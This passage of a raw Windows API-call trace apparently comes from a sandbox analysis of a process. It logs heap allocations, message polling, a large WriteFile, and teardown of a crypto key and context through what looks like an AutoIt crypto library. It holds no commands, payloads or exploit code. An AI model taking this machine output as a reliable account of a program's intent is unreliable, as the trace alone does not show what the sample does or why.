hHeap=0x970000) returned 1 [0236.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0236.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0236.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0236.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0236.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f3a0 | out: hHeap=0x970000) returned 1 [0236.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0236.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f508 | out: hHeap=0x970000) returned 1 [0236.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0236.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f440 | out: hHeap=0x970000) returned 1 [0236.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0236.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f6c0 | out: hHeap=0x970000) returned 1 [0236.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0236.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f530 | out: hHeap=0x970000) returned 1 [0236.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0236.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0236.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0236.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f468 | out: hHeap=0x970000) returned 1 [0236.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f2eb28 | out: hHeap=0x970000) returned 1 [0236.093] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0236.093] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0236.093] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0236.093] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0236.093] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f6e8 | out: hHeap=0x970000) returned 1 [0236.093] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e8d4c0 | out: hHeap=0x970000) returned 1 [0236.094] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0236.094] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0236.094] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0236.094] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0236.094] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f5d0 | out: hHeap=0x970000) returned 1 [0236.094] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0236.094] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0236.094] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0236.094] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0236.094] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0236.094] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0236.094] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14818 | out: hHeap=0x970000) returned 1 [0236.230] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0236.230] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0236.230] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0236.230] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0236.230] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0236.230] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0236.230] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0236.230] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f219a0 | out: hHeap=0x970000) returned 1 [0236.232] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0236.232] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0236.232] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd188) returned 0x2e80330 [0236.233] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e9a650 | out: hHeap=0x970000) returned 1 [0236.234] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0236.234] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0236.234] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0236.234] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0236.234] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a88 [0236.234] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0236.234] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0236.234] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0236.234] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0236.234] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0236.234] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0236.234] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0236.234] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0236.235] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0236.235] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0236.235] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd188) returned 0x2f14818 [0236.236] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0236.236] WriteFile (in: hFile=0x2d0, lpBuffer=0x2f14818*, nNumberOfBytesToWrite=0xd188, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2f14818*, lpNumberOfBytesWritten=0x8cf5e4*=0xd188, lpOverlapped=0x0) returned 1 [0236.238] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0236.238] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14818 | out: hHeap=0x970000) returned 1 [0236.238] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0236.239] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0236.239] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0236.239] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0236.239] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0236.239] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0236.239] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0236.239] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0236.239] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77588 | out: hHeap=0x970000) returned 1 [0236.239] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0236.239] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0236.239] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0236.239] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b48 [0236.239] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0236.239] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0236.239] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0236.239] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0236.239] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0236.239] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0236.240] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0236.240] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f468 [0236.240] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0236.240] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0236.240] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0236.240] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0236.240] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0236.240] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0236.240] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0236.240] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0236.240] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0236.240] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0236.240] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0236.240] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0236.240] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0236.240] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0236.240] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0236.240] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0236.240] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2e511f0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0236.241] CryptDestroyKey (hKey=0xa872d0) returned 1 [0236.241] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0236.241] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0236.241] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0236.241] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0236.241] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0236.241] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0236.241] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0236.241] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0236.241] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0236.241] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0236.241] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0236.241] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0236.241] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0236.241] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04230 | out: hHeap=0x970000) returned 1 [0236.241] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0236.241] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0236.242] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0236.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0236.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0236.242] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0236.242] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0236.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04150 | out: hHeap=0x970000) returned 1 [0236.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0236.242] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0236.242] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0236.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77588 | out: hHeap=0x970000) returned 1 [0236.242] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0236.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0236.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0236.242] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0236.242] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0236.242] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0236.242] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0236.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f800 | out: hHeap=0x970000) returned 1 [0236.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0236.243] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0236.243] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0236.243] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04348 | out: hHeap=0x970000) returned 1 [0236.243] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0236.243] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0236.243] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0236.243] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0236.243] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0236.243] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0236.243] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0236.243] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f046c8 | out: hHeap=0x970000) returned 1 [0236.243] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0236.243] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0236.243] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0236.243] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0236.243] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04460 | out: hHeap=0x970000) returned 1 [0236.243] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0236.243] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0236.244] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0236.244] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f530 | out: hHeap=0x970000) returned 1 [0236.244] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0236.244] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0236.244] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0236.244] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0236.244] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x2e69be8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0236.244] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0236.244] CryptReleaseContext (hProv=0xa5f958, dwFlags=0x0) returned 1 [0236.244] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0236.244] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d70 [0236.244] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0236.244] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0236.244] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0236.244] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0236.244] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0236.244] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0236.244] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0236.244] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0236.244] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0236.244] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0236.244] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0236.244] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0236.245] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0236.245] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0236.245] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0236.245] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0236.245] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0236.245] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0236.245] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0236.245] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0236.245] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0236.245] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0236.245] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0236.245] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0236.245] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0236.245] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0236.245] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0236.245] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0236.245] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0236.245] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0236.245] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0236.245] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0236.245] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0236.245] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0236.245] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0236.245] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0236.245] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0236.245] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0236.245] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f800 | out: hHeap=0x970000) returned 1 [0236.245] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0236.245] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0236.245] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0236.245] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0236.246] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0236.246] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56588 | out: hHeap=0x970000) 